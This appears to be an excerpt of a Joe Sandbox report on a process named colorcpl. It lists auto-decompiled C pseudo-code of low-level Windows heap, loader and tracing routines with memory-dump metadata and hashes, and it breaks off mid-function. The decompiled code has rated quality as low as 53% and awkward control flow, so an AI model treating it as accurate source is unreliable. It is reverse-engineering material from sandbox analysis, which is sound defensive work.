                                                                                                				L1:
                                                                                                				_t23 = _v8;
                                                                                                				if(_t23 != 0) {
                                                                                                					_t38 = _a4;
                                                                                                					if(_t23 >  *_a4) {
                                                                                                						_t42 = L06E34620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                                                                                						if(_t42 == 0) {
                                                                                                							goto L3;
                                                                                                						}
                                                                                                						_t23 = _v8;
                                                                                                					}
                                                                                                					_push( &_v8);
                                                                                                					_push(_t23);
                                                                                                					_push(_t42);
                                                                                                					_push(6);
                                                                                                					_push(_t43);
                                                                                                					_push(_v12);
                                                                                                					_push(_t36);
                                                                                                					if(E06E3F460() < 0) {
                                                                                                						if(_t42 != 0 && _t42 != _v16) {
                                                                                                							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                                                                                						}
                                                                                                						goto L3;
                                                                                                					}
                                                                                                					 *_v20 = _t42;
                                                                                                					 *_a4 = _v8;
                                                                                                				}
                                                                                                				_t43 = 1;
                                                                                                				goto L3;
                                                                                                			}













                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                • Instruction ID: 5b231cf6337d84099b9b12544cdca004da893c96c53e18350b72e8484d39dc22
                                                                                                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                • Instruction Fuzzy Hash: FD21D136A00328EFDBA0EF69DC80EFBBBBDEF85644F115059E90597610D630AE41D7A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 76%
                                                                                                			E06E19100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                                                                				signed int _t53;
                                                                                                				signed int _t56;
                                                                                                				signed int* _t60;
                                                                                                				signed int _t63;
                                                                                                				signed int _t66;
                                                                                                				signed int _t69;
                                                                                                				void* _t70;
                                                                                                				intOrPtr* _t72;
                                                                                                				void* _t78;
                                                                                                				void* _t79;
                                                                                                				signed int _t80;
                                                                                                				intOrPtr _t82;
                                                                                                				void* _t85;
                                                                                                				void* _t88;
                                                                                                				void* _t89;
                                                                                                
                                                                                                				_t84 = __esi;
                                                                                                				_t70 = __ecx;
                                                                                                				_t68 = __ebx;
                                                                                                				_push(0x2c);
                                                                                                				_push(0x6eef6e8);
                                                                                                				E06E6D0E8(__ebx, __edi, __esi);
                                                                                                				 *((char*)(_t85 - 0x1d)) = 0;
                                                                                                				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                                                				if(_t82 == 0) {
                                                                                                					L4:
                                                                                                					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                                                                						E06EE88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                                                                					}
                                                                                                					L5:
                                                                                                					return E06E6D130(_t68, _t82, _t84);
                                                                                                				}
                                                                                                				_t88 = _t82 -  *0x6f086c0; // 0xe207b0
                                                                                                				if(_t88 == 0) {
                                                                                                					goto L4;
                                                                                                				}
                                                                                                				_t89 = _t82 -  *0x6f086b8; // 0x0
                                                                                                				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                					goto L4;
                                                                                                				} else {
                                                                                                					E06E32280(_t82 + 0xe0, _t82 + 0xe0);
                                                                                                					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                                                					__eflags =  *((char*)(_t82 + 0xe5));
                                                                                                					if(__eflags != 0) {
                                                                                                						E06EE88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                                                                						goto L12;
                                                                                                					} else {
                                                                                                						__eflags =  *((char*)(_t82 + 0xe4));
                                                                                                						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                                                                							 *((char*)(_t82 + 0xe4)) = 1;
                                                                                                							_push(_t82);
                                                                                                							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                                                                							E06E5AFD0();
                                                                                                						}
                                                                                                						while(1) {
                                                                                                							_t60 = _t82 + 8;
                                                                                                							 *(_t85 - 0x2c) = _t60;
                                                                                                							_t68 =  *_t60;
                                                                                                							_t80 = _t60[1];
                                                                                                							 *(_t85 - 0x28) = _t68;
                                                                                                							 *(_t85 - 0x24) = _t80;
                                                                                                							while(1) {
                                                                                                								L10:
                                                                                                								__eflags = _t80;
                                                                                                								if(_t80 == 0) {
                                                                                                									break;
                                                                                                								}
                                                                                                								_t84 = _t68;
                                                                                                								 *(_t85 - 0x30) = _t80;
                                                                                                								 *(_t85 - 0x24) = _t80 - 1;
                                                                                                								asm("lock cmpxchg8b [edi]");
                                                                                                								_t68 = _t84;
                                                                                                								 *(_t85 - 0x28) = _t68;
                                                                                                								 *(_t85 - 0x24) = _t80;
                                                                                                								__eflags = _t68 - _t84;
                                                                                                								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                                                								if(_t68 != _t84) {
                                                                                                									continue;
                                                                                                								}
                                                                                                								__eflags = _t80 -  *(_t85 - 0x30);
                                                                                                								if(_t80 !=  *(_t85 - 0x30)) {
                                                                                                									continue;
                                                                                                								}
                                                                                                								__eflags = _t80;
                                                                                                								if(_t80 == 0) {
                                                                                                									break;
                                                                                                								}
                                                                                                								_t63 = 0;
                                                                                                								 *(_t85 - 0x34) = 0;
                                                                                                								_t84 = 0;
                                                                                                								__eflags = 0;
                                                                                                								while(1) {
                                                                                                									 *(_t85 - 0x3c) = _t84;
                                                                                                									__eflags = _t84 - 3;
                                                                                                									if(_t84 >= 3) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags = _t63;
                                                                                                									if(_t63 != 0) {
                                                                                                										L40:
                                                                                                										_t84 =  *_t63;
                                                                                                										__eflags = _t84;
                                                                                                										if(_t84 != 0) {
                                                                                                											_t84 =  *(_t84 + 4);
                                                                                                											__eflags = _t84;
                                                                                                											if(_t84 != 0) {
                                                                                                												 *0x6f0b1e0(_t63, _t82);
                                                                                                												 *_t84();
                                                                                                											}
                                                                                                										}
                                                                                                										do {
                                                                                                											_t60 = _t82 + 8;
                                                                                                											 *(_t85 - 0x2c) = _t60;
                                                                                                											_t68 =  *_t60;
                                                                                                											_t80 = _t60[1];
                                                                                                											 *(_t85 - 0x28) = _t68;
                                                                                                											 *(_t85 - 0x24) = _t80;
                                                                                                											goto L10;
                                                                                                										} while (_t63 == 0);
                                                                                                										goto L40;
                                                                                                									}
                                                                                                									_t69 = 0;
                                                                                                									__eflags = 0;
                                                                                                									while(1) {
                                                                                                										 *(_t85 - 0x38) = _t69;
                                                                                                										__eflags = _t69 -  *0x6f084c0;
                                                                                                										if(_t69 >=  *0x6f084c0) {
                                                                                                											break;
                                                                                                										}
                                                                                                										__eflags = _t63;
                                                                                                										if(_t63 != 0) {
                                                                                                											break;
                                                                                                										}
                                                                                                										_t66 = E06EE9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                                                                										__eflags = _t66;
                                                                                                										if(_t66 == 0) {
                                                                                                											_t63 = 0;
                                                                                                											__eflags = 0;
                                                                                                										} else {
                                                                                                											_t63 = _t66 + 0xfffffff4;
                                                                                                										}
                                                                                                										 *(_t85 - 0x34) = _t63;
                                                                                                										_t69 = _t69 + 1;
                                                                                                									}
                                                                                                									_t84 = _t84 + 1;
                                                                                                								}
                                                                                                								__eflags = _t63;
                                                                                                							}
                                                                                                							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                                                                							 *((char*)(_t82 + 0xe5)) = 1;
                                                                                                							 *((char*)(_t85 - 0x1d)) = 1;
                                                                                                							L12:
                                                                                                							 *(_t85 - 4) = 0xfffffffe;
                                                                                                							E06E1922A(_t82);
                                                                                                							_t53 = E06E37D50();
                                                                                                							__eflags = _t53;
                                                                                                							if(_t53 != 0) {
                                                                                                								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                							} else {
                                                                                                								_t56 = 0x7ffe0386;
                                                                                                							}
                                                                                                							__eflags =  *_t56;
                                                                                                							if( *_t56 != 0) {
                                                                                                								_t56 = E06EE8B58(_t82);
                                                                                                							}
                                                                                                							__eflags =  *((char*)(_t85 - 0x1d));
                                                                                                							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                                                                								__eflags = _t82 -  *0x6f086c0; // 0xe207b0
                                                                                                								if(__eflags != 0) {
                                                                                                									__eflags = _t82 -  *0x6f086b8; // 0x0
                                                                                                									if(__eflags == 0) {
                                                                                                										_t79 = 0x6f086bc;
                                                                                                										_t72 = 0x6f086b8;
                                                                                                										goto L18;
                                                                                                									}
                                                                                                									__eflags = _t56 | 0xffffffff;
                                                                                                									asm("lock xadd [edi], eax");
                                                                                                									if(__eflags == 0) {
                                                                                                										E06E19240(_t68, _t82, _t82, _t84, __eflags);
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t79 = 0x6f086c4;
                                                                                                									_t72 = 0x6f086c0;
                                                                                                									L18:
                                                                                                									E06E49B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                                                                								}
                                                                                                							}
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                			}


















                                                                                                0x06e191cd
                                                                                                0x06e191cd
                                                                                                0x06e191d2
                                                                                                0x06e191d5
                                                                                                0x06e19239
                                                                                                0x06e19239
                                                                                                0x06e191d7
                                                                                                0x06e191db
                                                                                                0x06e191e1
                                                                                                0x06e191e7
                                                                                                0x06e191fd
                                                                                                0x06e19203
                                                                                                0x06e1921e
                                                                                                0x06e19223
                                                                                                0x00000000
                                                                                                0x06e19223
                                                                                                0x06e19205
                                                                                                0x06e19208
                                                                                                0x06e1920c
                                                                                                0x06e19214
                                                                                                0x06e19214
                                                                                                0x06e191e9
                                                                                                0x06e191e9
                                                                                                0x06e191ee
                                                                                                0x06e191f3
                                                                                                0x06e191f3
                                                                                                0x06e191f3
                                                                                                0x06e191e7
                                                                                                0x00000000
                                                                                                0x06e191db
                                                                                                0x06e19187
                                                                                                0x06e19168

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 88cf39902e1e74573ca26bd87b75fd97afbbae8f5b3551457c3e2b481abb596a
                                                                                                • Instruction ID: 1a604cf62003c2e52121b29809089120679eab59a92e820b991fd67b602272d3
                                                                                                • Opcode Fuzzy Hash: 88cf39902e1e74573ca26bd87b75fd97afbbae8f5b3551457c3e2b481abb596a
                                                                                                • Instruction Fuzzy Hash: 20311670F10344DFEBE1DB68C4587ADB7F9BB49358F16A159C4156B242C330A9C8DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 53%
                                                                                                			E06E30050(void* __ecx) {
                                                                                                				signed int _v8;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr* _t30;
                                                                                                				intOrPtr* _t31;
                                                                                                				signed int _t34;
                                                                                                				void* _t40;
                                                                                                				void* _t41;
                                                                                                				signed int _t44;
                                                                                                				intOrPtr _t47;
                                                                                                				signed int _t58;
                                                                                                				void* _t59;
                                                                                                				void* _t61;
                                                                                                				void* _t62;
                                                                                                				signed int _t64;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_v8 =  *0x6f0d360 ^ _t64;
                                                                                                				_t61 = __ecx;
                                                                                                				_t2 = _t61 + 0x20; // 0x20
                                                                                                				E06E49ED0(_t2, 1, 0);
                                                                                                				_t52 =  *(_t61 + 0x8c);
                                                                                                				_t4 = _t61 + 0x8c; // 0x8c
                                                                                                				_t40 = _t4;
                                                                                                				do {
                                                                                                					_t44 = _t52;
                                                                                                					_t58 = _t52 & 0x00000001;
                                                                                                					_t24 = _t44;
                                                                                                					asm("lock cmpxchg [ebx], edx");
                                                                                                					_t52 = _t44;
                                                                                                				} while (_t52 != _t44);
                                                                                                				if(_t58 == 0) {
                                                                                                					L7:
                                                                                                					_pop(_t59);
                                                                                                					_pop(_t62);
                                                                                                					_pop(_t41);
                                                                                                					return E06E5B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                                                                				}
                                                                                                				asm("lock xadd [esi], eax");
                                                                                                				_t47 =  *[fs:0x18];
                                                                                                				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                                                                				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                                                                				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                				if(_t30 != 0) {
                                                                                                					if( *_t30 == 0) {
                                                                                                						goto L4;
                                                                                                					}
                                                                                                					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                					L5:
                                                                                                					if( *_t31 != 0) {
                                                                                                						_t18 = _t61 + 0x78; // 0x78
                                                                                                						E06EE8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                                                                					}
                                                                                                					_t52 =  *(_t61 + 0x5c);
                                                                                                					_t11 = _t61 + 0x78; // 0x78
                                                                                                					_t34 = E06E49702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                                                                					_t24 = _t34 | 0xffffffff;
                                                                                                					asm("lock xadd [esi], eax");
                                                                                                					if((_t34 | 0xffffffff) == 0) {
                                                                                                						 *0x6f0b1e0(_t61);
                                                                                                						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                                                                					}
                                                                                                					goto L7;
                                                                                                				}
                                                                                                				L4:
                                                                                                				_t31 = 0x7ffe0386;
                                                                                                				goto L5;
                                                                                                			}





















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 170940a19c7795bf0e2035098dd21b43ce706ceab9a5e70e5fb02051f50a2981
                                                                                                • Instruction ID: 5babf00cfcacbb44cf51876bc7659e516a39131e39dc55c79f21ae1774b962f3
                                                                                                • Opcode Fuzzy Hash: 170940a19c7795bf0e2035098dd21b43ce706ceab9a5e70e5fb02051f50a2981
                                                                                                • Instruction Fuzzy Hash: DC31C131611B04CFD7A1CF28C884B97B3E5FF88714F14596DE5AA87790EB71A801CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 77%
                                                                                                			E06E96C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                                                                                				signed short* _v8;
                                                                                                				signed char _v12;
                                                                                                				void* _t22;
                                                                                                				signed char* _t23;
                                                                                                				intOrPtr _t24;
                                                                                                				signed short* _t44;
                                                                                                				void* _t47;
                                                                                                				signed char* _t56;
                                                                                                				signed char* _t58;
                                                                                                
                                                                                                				_t48 = __ecx;
                                                                                                				_push(__ecx);
                                                                                                				_push(__ecx);
                                                                                                				_t44 = __ecx;
                                                                                                				_v12 = __edx;
                                                                                                				_v8 = __ecx;
                                                                                                				_t22 = E06E37D50();
                                                                                                				_t58 = 0x7ffe0384;
                                                                                                				if(_t22 == 0) {
                                                                                                					_t23 = 0x7ffe0384;
                                                                                                				} else {
                                                                                                					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                				}
                                                                                                				if( *_t23 != 0) {
                                                                                                					_t24 =  *0x6f07b9c; // 0x0
                                                                                                					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                                                                                					_t23 = L06E34620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                                                                                					_t56 = _t23;
                                                                                                					if(_t56 != 0) {
                                                                                                						_t56[0x24] = _a4;
                                                                                                						_t56[0x28] = _a8;
                                                                                                						_t56[6] = 0x1420;
                                                                                                						_t56[0x20] = _v12;
                                                                                                						_t14 =  &(_t56[0x2c]); // 0x2c
                                                                                                						E06E5F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                                                                                						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                                                                                						if(E06E37D50() != 0) {
                                                                                                							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                						}
                                                                                                						_push(_t56);
                                                                                                						_push(_t47 - 0x20);
                                                                                                						_push(0x402);
                                                                                                						_push( *_t58 & 0x000000ff);
                                                                                                						E06E59AE0();
                                                                                                						_t23 = L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                                                                                					}
                                                                                                				}
                                                                                                				return _t23;
                                                                                                			}













                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • Opcode ID: cef73e676c4b7d206b6ed2804e0d2de648ad1ea635ade7b9b0c54bf41c97fc41
                                                                                                • Instruction ID: 9a751d5c2802ea298ef6af4610225b1923cefe4540ca216f7b327b05e5c3c3f5
                                                                                                • Opcode Fuzzy Hash: cef73e676c4b7d206b6ed2804e0d2de648ad1ea635ade7b9b0c54bf41c97fc41
                                                                                                • Instruction Fuzzy Hash: 2F21ABB1A00654AFDB51DF68D884E6AB7B8FF48704F0400AAF904CB791D734ED10CBA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E06E590AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                                                                				intOrPtr* _v0;
                                                                                                				void* _v8;
                                                                                                				signed int _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				char _v36;
                                                                                                				void* _t38;
                                                                                                				intOrPtr _t41;
                                                                                                				void* _t44;
                                                                                                				signed int _t45;
                                                                                                				intOrPtr* _t49;
                                                                                                				signed int _t57;
                                                                                                				signed int _t58;
                                                                                                				intOrPtr* _t59;
                                                                                                				void* _t62;
                                                                                                				void* _t63;
                                                                                                				void* _t65;
                                                                                                				void* _t66;
                                                                                                				signed int _t69;
                                                                                                				intOrPtr* _t70;
                                                                                                				void* _t71;
                                                                                                				intOrPtr* _t72;
                                                                                                				intOrPtr* _t73;
                                                                                                				char _t74;
                                                                                                
                                                                                                				_t65 = __edx;
                                                                                                				_t57 = _a4;
                                                                                                				_t32 = __ecx;
                                                                                                				_v8 = __edx;
                                                                                                				_t3 = _t32 + 0x14c; // 0x14c
                                                                                                				_t70 = _t3;
                                                                                                				_v16 = __ecx;
                                                                                                				_t72 =  *_t70;
                                                                                                				while(_t72 != _t70) {
                                                                                                					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                                                                						L24:
                                                                                                						_t72 =  *_t72;
                                                                                                						continue;
                                                                                                					}
                                                                                                					_t30 = _t72 + 0x10; // 0x10
                                                                                                					if(E06E6D4F0(_t30, _t65, _t57) == _t57) {
                                                                                                						return 0xb7;
                                                                                                					}
                                                                                                					_t65 = _v8;
                                                                                                					goto L24;
                                                                                                				}
                                                                                                				_t61 = _t57;
                                                                                                				_push( &_v12);
                                                                                                				_t66 = 0x10;
                                                                                                				if(E06E4E5E0(_t57, _t66) < 0) {
                                                                                                					return 0x216;
                                                                                                				}
                                                                                                				_t73 = L06E34620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                                                                				if(_t73 == 0) {
                                                                                                					_t38 = 0xe;
                                                                                                					return _t38;
                                                                                                				}
                                                                                                				_t9 = _t73 + 0x10; // 0x10
                                                                                                				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                                                                				E06E5F3E0(_t9, _v8, _t57);
                                                                                                				_t41 =  *_t70;
                                                                                                				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                                                                					_t62 = 3;
                                                                                                					asm("int 0x29");
                                                                                                					_push(_t62);
                                                                                                					_push(_t57);
                                                                                                					_push(_t73);
                                                                                                					_push(_t70);
                                                                                                					_t71 = _t62;
                                                                                                					_t74 = 0;
                                                                                                					_v36 = 0;
                                                                                                					_t63 = E06E4A2F0(_t62, _t71, 1, 6,  &_v36);
                                                                                                					if(_t63 == 0) {
                                                                                                						L20:
                                                                                                						_t44 = 0x57;
                                                                                                						return _t44;
                                                                                                					}
                                                                                                					_t45 = _v12;
                                                                                                					_t58 = 0x1c;
                                                                                                					if(_t45 < _t58) {
                                                                                                						goto L20;
                                                                                                					}
                                                                                                					_t69 = _t45 / _t58;
                                                                                                					if(_t69 == 0) {
                                                                                                						L19:
                                                                                                						return 0xe8;
                                                                                                					}
                                                                                                					_t59 = _v0;
                                                                                                					do {
                                                                                                						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                                                                							goto L18;
                                                                                                						}
                                                                                                						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                                                                						 *_t59 = _t49;
                                                                                                						if( *_t49 != 0x53445352) {
                                                                                                							goto L18;
                                                                                                						}
                                                                                                						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                                                                						return 0;
                                                                                                						L18:
                                                                                                						_t63 = _t63 + 0x1c;
                                                                                                						_t74 = _t74 + 1;
                                                                                                					} while (_t74 < _t69);
                                                                                                					goto L19;
                                                                                                				}
                                                                                                				 *_t73 = _t41;
                                                                                                				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                                                                				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                                                                				 *_t70 = _t73;
                                                                                                				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                                                                				return 0;
                                                                                                			}



























                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                • Instruction ID: bdf390d9e194f9cf70265371c7c82be6b82ebfdc8be52e376b7948d99671a824
                                                                                                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                • Instruction Fuzzy Hash: B721AF71A00355EFDB60DF69C944AAAF7FCEF44314F16986AE959A7201D330AD04CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 59%
                                                                                                			E06E43B7A(void* __ecx) {
                                                                                                				signed int _v8;
                                                                                                				char _v12;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _t17;
                                                                                                				intOrPtr _t26;
                                                                                                				void* _t35;
                                                                                                				void* _t38;
                                                                                                				void* _t41;
                                                                                                				intOrPtr _t44;
                                                                                                
                                                                                                				_t17 =  *0x6f084c4; // 0x0
                                                                                                				_v12 = 1;
                                                                                                				_v8 =  *0x6f084c0 * 0x4c;
                                                                                                				_t41 = __ecx;
                                                                                                				_t35 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x6f084c0 * 0x4c);
                                                                                                				if(_t35 == 0) {
                                                                                                					_t44 = 0xc0000017;
                                                                                                				} else {
                                                                                                					_push( &_v8);
                                                                                                					_push(_v8);
                                                                                                					_push(_t35);
                                                                                                					_push(4);
                                                                                                					_push( &_v12);
                                                                                                					_push(0x6b);
                                                                                                					_t44 = E06E5AA90();
                                                                                                					_v20 = _t44;
                                                                                                					if(_t44 >= 0) {
                                                                                                						E06E5FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x6f084c0 * 0xc);
                                                                                                						_t38 = _t35;
                                                                                                						if(_t35 < _v8 + _t35) {
                                                                                                							do {
                                                                                                								asm("movsd");
                                                                                                								asm("movsd");
                                                                                                								asm("movsd");
                                                                                                								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                                                                							} while (_t38 < _v8 + _t35);
                                                                                                							_t44 = _v20;
                                                                                                						}
                                                                                                					}
                                                                                                					_t26 =  *0x6f084c4; // 0x0
                                                                                                					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                                                                				}
                                                                                                				return _t44;
                                                                                                			}













                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2bb09fe45805a2d1616792c468915a2c058822ef2e4f539b1de3991886ca989c
                                                                                                • Instruction ID: 82c35e4b62f9b79443a24965f60bc895da951e4ae31f110549efeb1147be2f38
                                                                                                • Opcode Fuzzy Hash: 2bb09fe45805a2d1616792c468915a2c058822ef2e4f539b1de3991886ca989c
                                                                                                • Instruction Fuzzy Hash: 0821D172A00618EFDB40DF58DD81F5AB7BDFB40348F1510A9EA08AB252C371ED05CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 80%
                                                                                                			E06E96CF0(void* __edx, intOrPtr _a4, short _a8) {
                                                                                                				char _v8;
                                                                                                				char _v12;
                                                                                                				char _v16;
                                                                                                				char _v20;
                                                                                                				char _v28;
                                                                                                				char _v36;
                                                                                                				char _v52;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed char* _t21;
                                                                                                				void* _t24;
                                                                                                				void* _t36;
                                                                                                				void* _t38;
                                                                                                				void* _t46;
                                                                                                
                                                                                                				_push(_t36);
                                                                                                				_t46 = __edx;
                                                                                                				_v12 = 0;
                                                                                                				_v8 = 0;
                                                                                                				_v20 = 0;
                                                                                                				_v16 = 0;
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t21 = 0x7ffe0384;
                                                                                                				} else {
                                                                                                					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                				}
                                                                                                				if( *_t21 != 0) {
                                                                                                					_t21 =  *[fs:0x30];
                                                                                                					if((_t21[0x240] & 0x00000004) != 0) {
                                                                                                						if(E06E37D50() == 0) {
                                                                                                							_t21 = 0x7ffe0385;
                                                                                                						} else {
                                                                                                							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                						}
                                                                                                						if(( *_t21 & 0x00000020) != 0) {
                                                                                                							_t56 = _t46;
                                                                                                							if(_t46 == 0) {
                                                                                                								_t46 = 0x6df5c80;
                                                                                                							}
                                                                                                							_push(_t46);
                                                                                                							_push( &_v12);
                                                                                                							_t24 = E06E4F6E0(_t36, 0, _t46, _t56);
                                                                                                							_push(_a4);
                                                                                                							_t38 = _t24;
                                                                                                							_push( &_v28);
                                                                                                							_t21 = E06E4F6E0(_t38, 0, _t46, _t56);
